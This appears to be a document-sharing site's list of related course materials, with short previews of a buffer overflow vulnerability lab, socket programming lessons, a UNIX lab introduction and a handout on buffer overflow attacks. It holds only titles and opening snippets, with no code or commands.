CPSC 8810 Fall 2018 Lab 1 1 Buffer Overflow Vulnerability Lab Due: September 06, 2018, Thursday (Noon) Submit your lab report through email to lcheng2@clemson.edu Copyright c 2006-2014 Wenliang Du, Syracuse
More informationIntroduction to Socket Programming
UNIT II - ELEMENTARY TCP SOCKETS Introduction to Socket Programming Introduction to Sockets Socket address Structures Byte ordering functions address conversion functions Elementary TCP Sockets socket,
More informationCS 43: Computer Networks. 05: Socket Programming September 12-14, 2018
CS 43: Computer Networks 05: Socket Programming September 12-14, 2018 Reading Quiz Lecture 5/6 - Slide 2 Socket Programming Adapted from: Donahoo, Michael J., and Kenneth L. Calvert. TCP/IP sockets in
More informationLab 0. Yvan Petillot. Networks - Lab 0 1
Lab 0 Yvan Petillot Networks - Lab 0 1 What You Will Do In This Lab. The purpose of this lab is to help you become familiar with the UNIX/LINUX on the lab network. This means being able to do editing,
More informationl27 handout.txt buggy server.c Printed by Michael Walfish Apr 28, 11 15:24 Page 1/1 Apr 27, 11 1:53 Page 1/2
Apr 28, 11 15:24 Page 1/1 1 Handout for CS 372H 2 Class 27 3 28 April 2011 4 5 1. Introduction to buffer overflow attacks 6 7 There are many ways to attack computers. Today we study the 8 "classic" method.
More information